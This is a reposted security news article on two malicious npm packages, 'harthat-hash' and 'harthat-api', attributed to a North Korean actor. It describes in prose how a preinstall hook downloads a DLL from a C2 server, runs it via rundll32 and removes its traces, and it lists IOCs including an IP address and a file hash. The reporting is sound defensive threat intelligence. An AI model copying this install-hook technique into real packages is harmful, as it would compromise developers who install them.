North Korean Hackers Attacking Windows Users With Weaponized npm Files

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

Post Sharing

Scalable package scanning within PyPi and npm using GuardDog software identified two malicious packages linked to a DPRK-aligned threat actor cluster dubbed “Stressed Pungsan.” 

The cluster strongly aligns with Microsoft’s MOONSTONE SLEET, indicating a sophisticated supply chain attack vector.

The packages are initial access points for malware distribution, enabling data exfiltration, credential theft, and lateral movement within targeted environments. 

Attack Flow

npm user nagasiren978 uploaded two malicious packages, “harthat-hash” and “harthat-api,”  on July 7th, 2024, which downloaded additional malware from a suspected North Korean C2 server. 

The server disseminates malicious batch scripts, and a DLL points to Windows systems as the intended target, which is consistent with MOONSTONE SLEET, a North Korean threat actor that Microsoft has identified. 

Two suspicious npm packages, harthat-hash and harthat-api, exhibit malicious behavior by employing a pre-install script to download a malicious DLL from a remote server, execute it using rundll32, and then self-destruct.

Are you from SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Free Access

The packages are nearly identical except for a unique identifier in the download URL, suggesting a campaign targeting multiple victims with potentially varied payloads. 

A malicious npm package with the name harthat-api impersonates the legitimate package Hardhat by using names that are similar to those of the legitimate package.  

While the code originates from the well-known node-config repository, the malicious package modifies the package.json file to remove the preinstall script and change the name to config.

It also includes two additional files, deference.js and pk.json, whose purposes are not analyzed in this excerpt.  

The preinstall script maliciously downloads a DLL file disguised as a temporary file from a remote server, renames it to “package.db,” and executes it using the “rundll32” system utility. 

This technique, known as “System Binary Proxy Execution,” attempts to evade detection and then cleans up by deleting the downloaded DLL and restoring the original “package.json” file, masking its malicious activity. 

List of Exported functions from IDA Pro 

The Datadog Security Research team’s analysis of the malicious DLL revealed a seemingly benign binary with no apparent malicious functionality. It exported two functions, one of which, GenerateKeyW, is expected to contain malicious code. 

Static and dynamic analysis failed to uncover any self-modification or harmful behavior within the DLL.

The absence of malicious code suggests that the DLL is either an incomplete or testing version, indicating the threat actor is potentially experimenting with their infrastructure or making an operational error. 

Disassembly showing contents of GenerateKeyW 

In a recent attack, threat actors compromised targets via malicious npm packages, harthat-api-v1.3.1.zip, and harthat-hash-v1.3.3.zip, which likely contained copied content to appear legitimate. 

The malicious payloads were downloaded from IP address 142.111.77.196. Potential indicators of compromise (IOCs) include the filenames Temp.b (also known as package.db) and its SHA256 hash, d2a74db6b9c900ad29a81432af72eee8ed4e22bf61055e7e8f7a5f1a33778277.

How to Build a Security Framework With Limited Resources IT Security Team (PDF) - Free Guide